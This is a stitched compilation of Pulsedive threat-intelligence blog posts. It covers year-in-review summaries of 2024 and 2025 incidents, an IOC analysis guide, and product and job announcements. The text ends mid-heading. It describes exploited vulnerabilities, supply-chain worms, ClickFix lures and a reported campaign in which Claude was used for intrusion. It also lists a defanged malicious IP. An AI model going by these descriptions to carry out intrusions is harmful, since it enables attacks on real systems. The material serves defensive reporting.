Pulsedive now has a dedicated documentation site: docs.pulsedive.com. Whether you're exploring Pulsedive for the first time or building against it at scale, the docs are your reference for what our API can do and how you can use it.Why now?Pulsedive’s docs started where a lot of companies’ docs start: built into the product, close to the team, good enough for the scale at the time. As the platform grew, so did the gap. More features meant more things to document, more places where the docs lagge
Pulsedive now has a dedicated documentation site: docs.pulsedive.com. Whether you're exploring Pulsedive for the first time or building against it at scale, the docs are your reference for what our API can do and how you can use it.
Why now?
Pulsedive’s docs started where a lot of companies’ docs start: built into the product, close to the team, good enough for the scale at the time. As the platform grew, so did the gap. More features meant more things to document, more places where the docs lagged behind the API, and more time you spent tracking down answers that should have been right in front of you.
Frictionless access to Pulsedive data and our products is one of our core principles. The old docs setup wasn’t living up to that. This site is the fix.
What's available now
This first release covers the complete API surface, with request parameters, response schemas, and curl examples throughout:
Indicators: Get full indicator context in a single request, including risk scores, properties, linked indicators, and metadata
Scan: Submit indicators for on-demand enrichment (passive or active) and poll for results
Threats: Query threat data including associated indicators, aliases, risk levels, and timeline information
Feeds: Download bulk indicator data, filtered by risk, type, and time period
Explore: Run structured queries across Pulsedive's indicator and threat database
STIX via TAXII: Pull indicator and threat data in STIX 2.1 format over TAXII 2.1, with full filter support
Global reference: Authentication, output formats, error codes, and pagination, all in one place
Built for how you actually work
Every endpoint includes full parameter tables right where you need them: descriptions, accepted values, defaults. So you’re not hunting across pages to understand a single call.
Response schemas show what you’ll actually get back, including the different shapes a response can take depending on what you asked for.
The docs also include a full API playground. Make live calls against the API, see real response shapes, and build your request in curl without leaving the page.
TAXII has its own dedicated playground too. Try the full TAXII surface the same way, with your API key.
Search, light and dark mode, and a clean information hierarchy round it out. Because documentation that is hard to navigate isn’t actually useful.
Use it with your AI tools
If you're already using an AI assistant to write and debug your integrations, it should be able to answer questions about the Pulsedive API directly, not guess based on whatever it last scraped from the internet.
Connect the MCP server atdocs.pulsedive.com/mcp to Claude, Cursor, VS Code, or any MCP-compatible tool. Here’s how to get started in Claude:
Open Claude and go to Customize > Connectors.
Select +, then Add custom connector.
Enter a name for your connector (we used "Pulsedive Docs") and set the Remote MCP server URL to https://docs.pulsedive.com/mcp.
Select Add.
Your AI assistant can now query the Pulsedive docs directly. No web search, no stale results.
More on the way
This is the foundation, not the finish line. Integration guides, workflow examples, and content built for security teams putting Pulsedive data to work in their programs are on the way.
Teams are already using the API to enrich indicators at detection time, automate threat lookups that used to be manual, and pipe Pulsedive data into their own tooling. If you're building something in this space, we’d love to hear about it.
This blog aims to highlight some of the major incidents and events in cyberspace in 2025. This year saw the disclosure of vulnerabilities that were rapidly exploited, the continued success of ransomware operators, and law enforcement takedowns disrupting malware-as-a-service operations. Apart from the continued targeting of public-facing sources such as firewalls and other networking appliances, this year also saw several supply chain compromises, including the Shai-Hulud worm. Read on for a rev
This blog aims to highlight some of the major incidents and events in cyberspace in 2025. This year saw the disclosure of vulnerabilities that were rapidly exploited, the continued success of ransomware operators, and law enforcement takedowns disrupting malware-as-a-service operations. Apart from the continued targeting of public-facing sources such as firewalls and other networking appliances, this year also saw several supply chain compromises, including the Shai-Hulud worm.
Read on for a review of:
Review of our predictions from 2024
State of vulnerability exploitation
Top malware
Law enforcement actions
Predictions for 2026
Pulsedive rewind
Recap
Looking Back at Our Predictions for 2025
Exploitation of Public-Facing Infrastructure
In 2024, we predicted that exploitation attempts against public-facing infrastructure would remain commonplace. Moreover, we expected to observe rapid adoption of exploit and proof-of-concept code by threat actors seeking to exploit these devices. This prediction held, as evidenced by vulnerabilities such as ToolShell, React2Shell, and CVE-2025-59287, where exploitation attempts skyrocketed after researchers released proof-of-concept code. The Key Exploited Vulnerabilities section below discusses notable vulnerabilities from 2025.
Continued RMM Abuse
We also predicted that threat actors will continue to abuse RMM tools during intrusions. These tools allow threat actors to gain access to an environment and establish secondary persistence mechanisms within it. Part of the appeal of using these tools is that threat actors don’t need to deploy additional tooling and can blend in by using applications already used within a victim’s environment.
Figure 1: Blackpoint Cyber identified incidents across 13 industries in which the threat actor used GoToResolve during the intrusion. Source: Blackpoint Cyber
Use of Gen AI in attacks
Last year, we predicted that threat actors would adopt Gen AI tooling to help create more effective social engineering lures and malicious tooling. While we had predicted that Gen AI tools would help threat actors, 2025 revealed that threat actors have integrated AI into malware and used prompt engineering to bypass AI safety controls. Notably, Anthropic reported on the first AI-orchestrated cyber espionage campaign.
Cyber Espionage Campaign Detected by Anthropic
Anthropic released a report on November 13, 2025, detailing what they claimed was an AI-enabled cyber espionage campaign. Anthropic attributed the intrusion to a Chinese state-sponsored group that targeted around 30 organizations with multiple successful intrusions. The threat actor leveraged AI through the kill chain to help achieve their objectives.
AI uses:
Autonomous Reconnaissance
Leveraged MCP servers to document infrastructure, authentication mechanisms, and identify vulnerabilities
Once access was obtained, Claude was used to map network services and IP ranges to identify services
Vulnerability Discovery
Claude used to generate payloads for vulnerabilities and analyze responses
Credential Collection
Extraction of authentication certificates
Lateral movement
Authentication to APIs, Database systems, and container registries
Data Collection
Collection of information from authenticated services such as databases, and sorts the data collected by value
Documentation
Detailed documentation was created that contains information about identified services and exfiltrated data
Anthropic outlined that the campaign predominantly leverages open-source red team tooling rather than custom malware.
💡
For more details about Anthropic’s findings, read their report.
Figure 2: Actions performed by Claude during the vulnerability scanning phase of the attack.
Recorded Future released the AI Malware Maturity Model, noting that most AI malware would fall into the experimenting, adopting, or optimizing categories instead of fully automated attacks. Current AI usage aligns with our prediction that AI is a tool to enable threat actors, not one that removes the human operator from the attack. Recorded Future also identified different types of AI malware.
Figure 3: Types of AI malware as determined by Recorded Future. Source: Recorded Future
Key Exploited Vulnerabilities
This section is not intended to be an exhaustive list of vulnerabilities exploited in 2025, but rather a selection of some memorable ones that most impacted security teams.
CISA’s Known Exploited Vulnerabilities (KEV) Catalog was used to collect statistics about exploited vulnerabilities in 2025. CISA has added 236 vulnerabilities to the catalog in 2025. The data used in the graphs below is accurate as of December 14th, 2025, at 12:17:58 EST.
Figure 4: Unique vulnerabilities added to CISA’s known exploited vulnerabilities catalog in 2025.
Of the 236 vulnerabilities added to KEV in 2025, 23 have been used in ransomware campaigns. These vulnerabilities include those in edge devices such as SMA100, NetScaler ADC, and Connect Secure. Other public-facing devices, such as Oracle E-Business Suite, SharePoint, and CrushFTP, were also targeted in ransomware campaigns.
Figure 5: Number of vulnerabilities added to CISA KEV in 2025 that have been used in ransomware campaigns.
ToolShell
ToolShell is a name given to two SharePoint vulnerabilities that allow a threat actor to bypass authentication (CVE-2025-49704) and remotely execute code by writing files to the server (CVE-2025-49706). CVE-2025-53770 and CVE-2025-53771 are CVEs assigned to subsequent vulnerabilities that bypassed patches for CVE-2025-49704 and CVE-2025-49706. Successful exploitation of these vulnerabilities led to files being dropped on the SharePoint servers.
Threat actors exploited these vulnerabilities to collect machine keys from SharePoint servers.
Figure 6: Web shell used to collect machine scripts from compromised SharePoint hosts. Source: Canadian Center for Cyber SecurityFigure 7: Snippet of POST request used to exploit the vulnerability. Source: Kaspersky
React2Shell
React2Shell (CVE-2025-55182) is a critical unauthenticated remote code execution vulnerability in the React Server Components (RSC) Flight protocol. Successful exploitation of the vulnerability will result in remote code execution. Threat actors have used this vulnerability to check for vulnerable components, conduct reconnaissance, and deploy additional payloads. Threat actors have used this vulnerability to deploy coinminers, such as XMRig, on vulnerable instances.
Figure 8: POST request where the threat actor attempts to initiate a ping request to an IP address. Source: eSentire
Mandiant has also reported on threat actors deploying XMRig to mine cryptocurrency. In one intrusion, the threat actor downloaded a shell script that, in turn, downloaded and executed XMRig from GitHub.
Malware
Information stealers continued to prove valuable for cybercrime actors. Due to their popularity, new malware-as-a-service offerings emerged in 2025. One such malware is Katz, which was first observed in April 2025. It advertised the ability to extract information from Chromium- and Gecko-based web browsers. Aura Stealer is another information stealer that was first observed in July 2025. AURA advertised support for Telegram integration via a bot and several configuration options.
Supply chain compromises have already been prominent throughout the year. We have seen several NPM and Python package compromises as well as malware masquerading as legitimate applications.
EvilAI
The operators behind EvilAI disguise their malware as productivity tooling that uses AI to enhance user experience. These malicious applications claim to provide productivity functionality, such as merging PDFs, and are signed with valid digital signatures. These malicious applications were distributed through malicious advertisements, SEO manipulations, and social media links.
Figure 9: Example of a digital certificate used by EvilAI. Source: Trend MicroFigure 10: EvilAI infection flow identified by Trend Micro. Source: Trend Micro
NPM Compromises
Several major NPM compromise campaigns impacted popular packages in 2025. Two of these campaigns were tied to the Shai-Hulud worm, which was used to exfiltrate sensitive information from GitHub repositories.
September 8th Campaign
The campaign from September 8th, 2025, compromised packages included chalk and debug. Both of these packages are downloaded over 250 million times a week. The compromised packages were modified to include malicious code. The malicious code targets cryptocurrency wallets by intercepting connections to cryptocurrency platforms and replacing the destination wallet with a hardcoded one.
Figure 11: Hardcoded Cryptocurrency Wallets added by the threat actor.
Shai-Hulud
💡
Pulsedive threat research covered the technical details of the first and second Shai-Hulud campaigns this year.
The Shai-Hulud worm was used to exfiltrate secrets from GitHub repositories. In the first Shai-Hulud campaign, compromise activity was seen from September 15 at 03:46 to September 16 at 13:42 EST. The malware used TruffleHog to identify and collect credentials and secrets. The identified data was exfiltrated using GitHub actions to the webhook[.]site domain.
As part of the attack, GitHub workflows were used to convert private repositories to public ones. The repositories that were turned into public ones had the description “Shai-Hulud Migration”, and the term -migration" was added to the name.
On November 24, 2025, multiple security vendors reported a new Shai-Hulud campaign that compromised several popular npm packages. The compromised packages include those from Zapier, ENS Domains, PostHog, and Postman. Researchers from Wiz identified that the earliest evidence of malicious npm packages being added to npm is from around 03:00 UTC on November 24th, 2025. The compromise results in a GitHub repository containing stolen information.
Law Enforcement Action and Disruption Operations
Operation Endgame
Figure 12: Operation Endgame banner added by Law Enforcement on seized domains. Source: Vectra
Law enforcement continued their disruption operations through Operation Endgame. In 2024, law enforcement disrupted the operations of malware-as-a-service offerings by targeting their distribution networks. The operations impacted operations for the following malware:
IcedID
SystemBC
Pikabot
SmokeLoader
BumbleBee
Trickbot
This operation led to the arrest of individuals involved in cybercrime and the takedown of infrastructure. Disruptions through Operation Endgame continued in 2025.
Law enforcement followed up their actions in 2024 by arresting customers of the SmokeLoader botnet operated by SuperStar. The botnet was sold on a pay-per-install basis, allowing customers to gain access to victim machines.
In November 2025, law enforcement agencies took down more than 1025 servers and seized 20 domains associated with Rhadmanthys, VenomRAT, and Elysium. By taking down servers, law enforcement disrupted the infrastructure used to host, control, and disseminate malware. The action also led to the arrest of an individual in Greece.
Disrupting Lumma
Microsoft seized and helped take down 2,300 domains associated with Lumma. In conjunction with Microsoft's actions, the U.S. Department of Justice also took control of the Lumma command infrastructure. Similarly, the Europol’s European Cybercrime Center and Japan’s Cybercrime Control Center suspended local Lumma infrastructure.
Figure 13: Seizure notice displayed on Lumma domains. Source: Microsoft
Looking Ahead
In 2025, threat actors continued to operate similarly to how they operated in 2024. We expect this to continue in 2026. Identity-based threats, such as stolen credentials or Adversary-in-the-Middle threats like phishing kits, will continue to play a significant role in intrusions. CrowdStrike notes that valid account abuse was the primary initial access method in 35% of cloud intrusions, while access-broker advertisements on forums increased by 50% compared to previous years.
The use of Generative AI will continue to increase in 2026, and we expect threat actors to embed AI in their operations. Furthermore, we expect AI malware to continue to mature, and we will see more automated intrusions that leverage AI in the future.
Pulsedive Rewind
GitHub Page
Towards the end of 2025, we created our GitHub page. The resources repository on our GitHub holds additional artifacts from the analysis we conducted for our blogs. These artifacts include samples, scripts, examples of exfiltrated data, and PCAPs.
For Black Friday and Cyber Monday this year, our Annual Promotion Turkey (aka APT) is back with a deal for Pulsedive Pro.The Highlights30% Off 12 Months of Pro with BLACKFRIDAY25🏷️Get 30% off up to 12 months of a Pulsedive Pro plan by using code "BLACKFRIDAY" during checkout before midnight on December 1, 2025. For more information, read on:What's Pulsedive Pro?What's the Deal?FAQsMore Black Friday DealsWhat is Pulsedive Pro?Pro is an affordable upgrade of the Pulsedive Community experience, dev
For Black Friday and Cyber Monday this year, our Annual Promotion Turkey (aka APT) is back with a deal for Pulsedive Pro.
The Highlights
30% Off 12 Months of Pro with BLACKFRIDAY25
🏷️
Get 30% off up to 12 months of a Pulsedive Pro plan by using code "BLACKFRIDAY" during checkout before midnight on December 1, 2025.
For more information, read on:
What's Pulsedive Pro?
What's the Deal?
FAQs
More Black Friday Deals
What is Pulsedive Pro?
Pro is an affordable upgrade of the Pulsedive Community experience, developed for security analysts, engineers, researchers, and enthusiasts. Pro offers more of the data that Pulsedive users love, all in the same intuitive interface.
Features include:
Third party enrichment integrations: VirusTotal, Shodan, AbuseIPDB
How to Redeem: After hitting "checkout" from Pulsedive's purchase page, enter "BLACKFRIDAY25" in the promotion code field. Complete payment information and subscribe. You'll need to first have an existing Pulsedive account, which you can create here: https://pulsedive.com/register
When you cancel, your subscription will end immediately and you will not be billed in the future. You can re-subscribe or upgrade Pulsedive plans under your account page, but the discount will no longer apply.
I don't have an account? To purchase any Pulsedive plan, you must have an account. Register a free account here: https://pulsedive.com/register
I want a custom plan? (e.g. multiple Pro seats, multi-year subscription, or multiple products)? Contact sales@pulsedive.com. We offer discounts on bundles of Pro seats for organizations looking to grab multiple licenses in one go.
🦃 Happy Black Friday Deal Hunting!
For other infosec deals, we're tracking and adding Black Friday 2025 lists here:
Calling all Pulsedive users and community members: we want your input.Whether you read every new Pulsedive Threat Research blog post or have only come across one, your feedback will help us create and share the content that matters most to you. Take our quick 5 minute survey to share what topics, research, and formats you’d like to see more of. Your insights will inform future research-focused articles and analysis.Take our 5 minute survey:Take SurveyURL: https://forms.gle/QhduoWXSd8s4GRtH6Thank
Calling all Pulsedive users and community members: we want your input.
Whether you read every new Pulsedive Threat Research blog post or have only come across one, your feedback will help us create and share the content that matters most to you. Take our quick 5 minute survey to share what topics, research, and formats you’d like to see more of. Your insights will inform future research-focused articles and analysis.
In the field of cyber threat intelligence (CTI), IP addresses and domain names are commonly shared indicators of compromise. They are commonly used solely to create blocklists on tools such as firewalls and other networking devices. Blocking these atomic indicators of compromise is a viable solution when consuming threat intelligence feeds, but they can also be used to enrich alerts, provide context, and expand detection logic. This blog outlines how IP addresses and domains can provide addition
In the field of cyber threat intelligence (CTI), IP addresses and domain names are commonly shared indicators of compromise. They are commonly used solely to create blocklists on tools such as firewalls and other networking devices. Blocking these atomic indicators of compromise is a viable solution when consuming threat intelligence feeds, but they can also be used to enrich alerts, provide context, and expand detection logic. This blog outlines how IP addresses and domains can provide additional value within the disciplines of threat intelligence, detection engineering, and threat hunting. Moreover, this blog will share details and guidance on how to conduct IP and domain analysis to draw conclusions, as well as showcase examples of data processing from Pulsedive and popular analyst tools.
The Pyramid of Pain
Any discussion about value within threat intelligence will likely touch upon the Pyramid of Pain. The Pyramid of Pain, coined by David Bianco, is a model used in CTI to illustrate the difficulty experienced by adversaries and threat actors when defenders detect and respond to different types of indicators during an attack. Moving up the pyramid from hash values to TTPs is correlated with the increased "pain" inflicted on the adversary, becoming more challenging to replace or adapt. IP addresses and domain names make up two of the lower tiers in the pyramid and may not cause as much pain to threat actors as detecting tools or TTPs. This is because IP addresses and domains can be ephemeral. Threat actors can quickly rotate through IP addresses during campaigns, negating the impact of blocking individual addresses. Similarly, domain names can be registered in bulk; with various registrars, it is easy for a threat actor to spin up network infrastructure fairly quickly.
Figure 1: The Pyramid of Pain
Since these indicator types are ephemeral, even adding these indicators to blocklists may provide limited value. Blocking provides value when a threat actor consistently uses the same IP address or domain name across a campaign. Once they rotate to a new IP address or domain, the blocked indicators cease to provide value outside of retroactive investigations. In the short term, blocking IP addresses and domain names can yield timely results and identify malicious or suspicious activity. However, these lists need to be actively maintained and regularly purged to remove indicators that are no longer active or have been removed by vendors.
💡
How long until an IOC should be or is retired will depend on several factors, including: - The confidence level associated with that IOC - When was the indicator last seen? - Is this indicator associated with other threats? - Storage limitation on tools (blocklists have a finite size)
Uses of IPs and Domains
Providing Context During Investigations
Security analysts often spend time either manually enriching data to gain additional information about events or leveraging automated lookups to provide this context. Enriching IP addresses can include leveraging IP geolocation data, reputation data, and provider data. Geolocation data can give an approximation of the user’s location when a specific activity is performed and can be used to identify compromised accounts when multiple login sessions or actions are performed by the same user, but from physical locations that are not possible. Reputation data is another valuable enrichment during investigations, as it sheds light on the IP addresses and the other activities associated with them. Common reputation clues include if it has been reported by other users for exploitation or scanning activity, or if it belongs to a VPN provider.
Examples of how Pulsedive users leverage this enrichment data:
Manual Approach: An analyst visits Pulsedive, performs a scan, and collects the relevant information to help during an investigation.
Hybrid/Automated Approach: A SIEM/SOAR solution integrates with Pulsedive and is configured to retrieve data about IP addresses and domains. An alert may be triggered based on suspicious activity, where an analyst then uses this data to investigate an alert and make a determination about this activity.
Figure 2: A sample workflow of a Pulsedive client using enriched data during an investigation.
Atomic indicators can also be used to hunt for malicious activity in an environment. Simpler to conduct than behavioral threat hunting, indicator-based hunting focuses on the presence of known malicious indicators of compromise (IOCs) to identify malicious activity in historical network logs. Security tools can be used to search for the presence of IOCs that security researchers have shared throughout an environment. Hits on these IOCs may lead to the discovery of previously undetected intrusions.
Research
Indicators can be tied together to identify particular malware families and reveal commonalities that make it easier to identify other artifacts associated with that threat. For example, Pulsedive threat research used IP addresses, domains, and content served on web pages to track and identify additional Mystic Stealer control panels back in July 2023.
When we encountered research from other vendors regarding Mystic Stealer, we utilized the IOCs to identify commonalities between them before attempting to identify additional domains to track. Our approach involved looking at the following items for each identified IOC:
Figure 3: Pivot points used during our investigation.
Based on information shared by security researchers, we observed that the HTML title for the control panel was "Mystic Stealer - Login". We used this information to pivot to tools such as FOFA, Shodan, and Binary Edge to identify additional IP addresses and domains associated with Mystic Stealer Control Panels.
Figure 4: HTML content reveals that the console page has an HTML title of "Mystic Stealer - Login".Figure 5: Mystic Stealer Control Panels identified on Shodan during our investigation in 2023
IP Analysis Tools
💡
The Curated Intel team shared a GitHub repository that contained tools to collect information about an IP address.
Depending on the use case and the information we want to obtain, many tools can provide information about IP addresses. This information can include:
IP Reputation
IP Geolocation
Is it a Cloud/CDN IP?
Is it a VPN, Tor node, or proxy?
IP WHOIS
ASN
Open Ports & Services Running
Figure 6: Information that can be obtained from an IP address.
During investigations, some of the first items analysts commonly check for are the reputation and geolocation of an IP address. IP reputation can show if an IP address has been observed by others performing scans or attempting to exploit vulnerabilities.
Figure 7: IP addresses associated with CVE-2024-8963 exploitation attempts within GreyNoise.Figure 8: ASN information provided by ipinfo for an IP address seen in Figure 7.Figure 9: An IP address previously associated with Mystic Stealer.
Tools such as Spur or IP Quality Score can be used to detect VPN or Proxy usage. This information is valuable during investigations, as it can explain differences in geolocation and be used to track activity against specific devices or sessions. Moreover, the use of specific VPN providers or proxies can be used to cluster activity to different threat groups. For example, security researchers have identified that Famous Chollima frequently uses Astrill VPN during intrusions.
Figure 10: IP address from SilentPush that was observed being used by Famous ChollimaFigure 11: Mind map of how ASN data can be utilized in Threat Hunting and security investigations. Source: Huntress
Other Analysis Tools
Data collected about domains can also be used to cluster activity back to a particular threat or actor. In some cases, this will be as simple as examining X.509 certificates to identify common names. In contrast, in other cases, it will require a wealth of data from both the domain and the IP addresses to recognize patterns.
Some of the information that can be collected about domains includes:
WHOIS/RDAP Information
Date registered
Registrar Information
Content hosted
Certificate Details
Favicons
Meta Tags
Figure 12: Pivot points associated with domains.
X.509 certificate data contains a wealth of information that can be used to identify additional IOCs.
Figure 13: Some key items that make up an X.509 certificate. Complete details are available in RFC5280.Figure 14: List of distinguished names available for subject and issuer names. Source: Cryptosys.
Taking an entry for DCRat from the SSL Blacklist provides us with a SHA1 fingerprint, Subject Name, and Issuer Name. Any of these can be used to search tools like Censys to identify additional IP addresses using the same certificate.
Figure 15: SSL Blacklist entry for a certificate used by DcRat.Figure 16: Censys results showing 46 IPs that use an SSL certificate where the subject common name contains 'DCRat'.
Searching Censys for the value DCRat in the subject common name yields 46 results. Drilling into the IP 203[.]104[.]42[.]92, the certificate details reveal that the subject common name is the same, but the issuer distinguished name is different.
Figure 17: X.509 certificate details for the IP 203[.]104[.]42[.]92
Unique values within certificate data can also be incorporated into detections. A blog by Corelight contains network signatures that focus on the content of the TLS certificate.
Figure 18: Corelight detections for AsyncRAT and other variants.
Conclusion
The ephemeral nature of IP addresses and domains means that they may not seem as valuable within threat intelligence and detection engineering as other artifacts. This is true to a certain extent, but analyzing IP addresses and domains can help researchers and analysts uncover additional detections useful in identifying additional IOCs or malicious activity.
Analysis of IP addresses and domain names can reveal patterns or unique identifiers, such as particular proxies being used to initiate connections. X.509 certificates contain specific values that allow security teams to detect additional suspicious or malicious data. Moreover, analysis can help cluster activity based on commonalities between artifacts to identify a particular threat or actor. The speed of sharing, ease of automation, and availability make these IOCs a component of a holistic threat intelligence program. When contextualized alongside other indicators higher up in the pyramid of pain, teams can gain valuable insights into threat actor behavior, which may lead to additional detection opportunities.
Update: This role is now closed and no longer accepting applications.⭐PulsedivePart-Time / ContractFully Remote, GlobalHQ in USAThe OpportunityCreate clear, concise, and user-friendly documentation that empowers our community to effectively utilize Pulsedive's platform.Pulsedive is a threat intelligence startup that delivers frictionless threat intelligence solutions for growing teams. We bring together intelligence in our platform and data products (Pro, API, Feed, Enterprise TIP), correlating
Update: This role is now closed and no longer accepting applications.
⭐
Pulsedive Part-Time / Contract Fully Remote, Global HQ in USA
The Opportunity
Create clear, concise, and user-friendly documentation that empowers our community to effectively utilize Pulsedive's platform.
Pulsedive is a threat intelligence startup that delivers frictionless threat intelligence solutions for growing teams. We bring together intelligence in our platform and data products (Pro, API, Feed, Enterprise TIP), correlating indicators of compromise and organizing information to support threat collection, pivoting, research, and analysis.
Pulsedive is looking for a skilled technical writer on a contracting basis to document use cases, technical specifications, and guides for our platforms, products, and integrations. If you’re energized by making complex technical information accessible and engaging for technical audiences, this is the role for you. You will work closely with product and engineering to research, write, and maintain high-quality documentation that helps our users and clients leverage Pulsedive's solutions to their fullest potential.
Working at Pulsedive
Regardless of your role or expertise, we seek candidates who embrace honesty, enjoy constant learning, and are empowered by ownership of their work. As a product-led company, our users are our primary stakeholders. We believe there are countless ways for talented individuals from all backgrounds to contribute their unique skills, interests, and perspectives as Pulsedive grows—and we can't wait to work with and learn from you.
You’ll Get To
Document technical features, integrations, architectures, and APIs
Create clear and accessible guides, walkthroughs, and help articles for a range of technical audiences and uses cases
Migrate and improve existing content, creating a streamlined and centralized system for all technical documentation
Collaborate with Pulsedive leadership and subject matter experts
Get hands-on learning by using Pulsedive tools and sandboxed environments
Help maintain up-to-date information to reflect new features, integrations, and product changes
Create maintenance plans and style guides, laying the groundwork for future documenters
Communicate information with diagrams, charts, illustrations, animations, and more to effectively convey concepts and architectures
Act on feedback to improve Pulsedive’s documentation and user support content
Manage your time and workflow independently in a fully remote environment
What You’ve Got (and We Want)
3+ years experience in technical writing, documentation, or related fields
2+ years in IT, computer science, networking, and/or cybersecurity
Proficiency in English with the ability to communicate technical concepts in a clear, concise, and user-friendly manner
Proven experience creating documentation for cloud-based SaaS products
Ability to research and write documentation for new features and integrations, while closing gaps in existing content
Ability to interview subject matter experts to extract and clarify complex technical information with minimal review
Bonus Points For
Familiarity researching and deploying tools or platforms for technical documentation
Practical experience with customer success and enablement
Extensive experience with cybersecurity platforms, particularly in threat intelligence
This is a part-time, fully remote contract role with potential for a full-time role at Pulsedive. Our working schedule is flexible, with an average 10 hour weekly commitment. You will have high levels of autonomy, working asynchronously with the Pulsedive team. We’ll develop expectations, milestones, and timelines for deliverables together - but give you the space to work in the ways you find the most productive and fulfilling.
Not for you, but you know someone who knows someone? Help us get the word out by sharing this post!
What Happens Next?
After we receive your application, we'll update you on your status. If we think there's a fit, we'll send you a quick email to verify relevant experience and then set up a time to interview.
This blog aims to highlight some of the major incidents and events in cyberspace in 2024. Looking back, it feels like 2024 flew by with a steady stream of issues constantly grabbing the attention of defenders (and the media). Apart from the continued targeting of public-facing sources such as firewalls and other networking appliances, this year will be remembered for law enforcement takedowns and the CrowdStrike outage. Read on for a review of:Our predictions for 2024 from last yearKey exploited
This blog aims to highlight some of the major incidents and events in cyberspace in 2024. Looking back, it feels like 2024 flew by with a steady stream of issues constantly grabbing the attention of defenders (and the media). Apart from the continued targeting of public-facing sources such as firewalls and other networking appliances, this year will be remembered for law enforcement takedowns and the CrowdStrike outage.
Read on for a review of:
Our predictions for 2024 from last year
Key exploited vulnerabilities
Top malware
Outages
Law enforcement actions
Looking ahead to 2025
Pulsedive rewind
Recap
Looking back at our predictions for the year
Vulnerability and Exploitation Predictions
In 2023, we predicted that exploitation attempts against public-facing infrastructure and the rapid exploitation of these appliances will continue to increase in 2024. Unfortunately, this prediction appeared to come true, with several vulnerabilities within public-facing applications being exploited for initial access into environments being observed throughout the year. This blog's Key Exploited Vulnerabilities section below discusses some notable exploited vulnerabilities.
Ransomware Predictions
We expected ransomware to continue being one of the more prominent threats organizations faced in 2024. This was observed as ransomware attacks continued to grab headlines as threat actors targeted organizations worldwide. We also observed several groups deploying ransomware at healthcare organizations. Defenders and law enforcement had some success against ransomware, with takedowns against LockBit.
Key Exploited Vulnerabilities
💡
This section is not intended to serve as an exhaustive list of vulnerabilities exploited in 2024 but rather as a summary of some memorable ones that affected security teams.
Cleo File Transfer Software
On December 3rd, 2024, Huntress released a blog outlining the exploitation of Cleo Harmony, Cleo VLTrader, and Cleo LexiCom software, which led to unauthenticated remote code execution. Organizations use these file transfer software programs to share files with other users. Initially released as CVE-2024-50623, it was quickly discovered that the patches for this vulnerability did not mitigate the risk, and patches for CVE-2024-55956 addressed the issues.
CVE-2024-55956 allowed an unauthenticated threat actor to import and execute bash or PowerShell commands using the Autorun directory. This vulnerability allowed the attacker to access external infrastructure to download files used in post-exploitation attempts.
BleepingComputer reported that the Cl0p ransomware group used this vulnerability to exfiltrate data from organizations.
Figure 1: Cl0p confirms that they are responsible for intrusions that exfiltrated data from Cleo instances. Source: BleepingComputer
Exploitation of Public Facing Infrastructure
Threat actors heavily targeted networking software and file transfer appliances throughout 2024. These software and appliances are public-facing and may offer access to corporate environments. Because they are more accessible, they remain high-priority targets, and we observed threat actors rapidly exploit these vulnerabilities once they are made available.
Some of the notable vulnerabilities in public-facing software observed this year included:
CVE-2024-3400 - PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect
CVE-2024-3400 is an arbitrary file creation vulnerability in the Global Protect feature of PAN-OS. It can lead to OS command injection and has been used to exfiltrate data from the server or run commands. Palo Alto tracked the exploitation of this vulnerability as Operation MidnightEclipse.
Figure 2: Level of exploitation as categorized by Palo Alto. Source: Palo Alto
CVE-2024-8190 is an OS command injection vulnerability in the Ivanti Cloud Services Application (CSA). For versions 4.6 Patch 518 and before, exploiting this vulnerability could allow an unauthenticated attacker to execute code remotely. CISA has added this vulnerability to its known exploited vulnerability catalog.
CVE-2024-47574 (FortiJump) - Authentication Bypass in FortiClientWindows
CVE-2024-47575, also called FortiJump, is an authentication bypass in Fortinet FortiClientWindows versions 7.4.0, 7.2.4 through 7.2.0, 7.0.12 through 7.0.0, and 6.4.10 through 6.4.0. This vulnerability allowed a threat actor-controlled FortiManager device to execute code against vulnerable FortiManager devices. Mandiant observed exploitation of the vulnerability as early as June 27, 2024.
Figure 3: An adversary-controller FortiManager being added to a victim's FortiGate devices. Source: Google
One of the year's biggest stories, CVE-2024-3094, is a vulnerability that affected the xz compression libraries in Linux distributions. The affected versions (5.6.0 and 5.6.1) of the xz libraries contained malicious code that allowed unauthorized access.
xz is a data compression format within Linux distributions. It helps compress and decompress large files into smaller sizes. The multi-stage backdoor is used to extract a shared object liblzma_la-crc64.fast.o, which is added to the compilation of the liblzma. The shared object replaced a function name, and when any process loads liblzma, the malicious code interferes with the function resolution process. OpenSSH’s RSA_public_decrypt function uses the liblzma, and the malicious code could be used to extract a command from the authenticating client’s certificate and use it for remote code execution.
Figure 5: How the compromised liblzma library could be used by sshd. Source: Akamai
Malware
This year, information stealers, like Agniane and Mystic Stealer, and other malware-as-a-service continued to be used against users and organizations. Information stealers served as the initial stages of intrusions, either collecting credentials or deploying other malware. Ransomware continued to be a major threat to organizations, with several groups targeting healthcare organizations and other critical industries.
Ransomware Targeting Healthcare
ALPHV targeted Change Healthcare, a revenue and payment management provider, in February 2024. 100+ million individuals had their data stolen in the attack, impacting the operations of healthcare organizations that used Change Healthcare. Change Healthcare appeared to pay a ransom of $22 million before ALPHV performed an exit scam, including deploying a fake law enforcement seizure banner on their data leak site.
Qilin targeted Synnovis with ransomware, which disrupted the operation of several NHS Trust locations in June 2024. For the NHS, Synnovis, a lab services provider, was hit with ransomware that disrupted their IT systems. The group was able to exfiltrate sensitive patient information, including names, dates of birth, NHS numbers, and test descriptions.
In May 2024, Ascension Health suffered a ransomware attack by Black Basta. The attack impacted hospital operations by taking Ascension’s MyChart, an electronic health record system, offline. While the service was down, healthcare professionals had to resort to manual documentation. Following an investigation, Ascension identified that 5.9 million individuals had their data stolen. The data exfiltrated during the attack included patient and employee names, as well as medical and payment information.
In addition to continuing ransomware attacks and identifying new malware types, malware authors continued experimenting with different methods of deploying their malware onto devices. One method that grew in popularity this year is ClickFix.
ClickFix
This social engineering tactic manipulates users into executing code on their devices. The user is presented with a document or a web page with a banner with instructions for the user to follow, similar to figures 6 - 8.
The banner will instruct the user to:
Launch the run dialog
Paste in content that is in their clipboard (an older version of ClickFix required the user to copy the malicious code, while newer versions automatically add it to the user’s clipboard)
Run the command
Figure 6: A ClickFix lure within a Word document. Source: McAfeeFigure 7: A ClickFix lure displayed on a web page. Source: McAfeeFigure 8: ClickFix lure that doesn't require users to copy commands. Source: Sekoia
CrowdStrike BSOD Outage
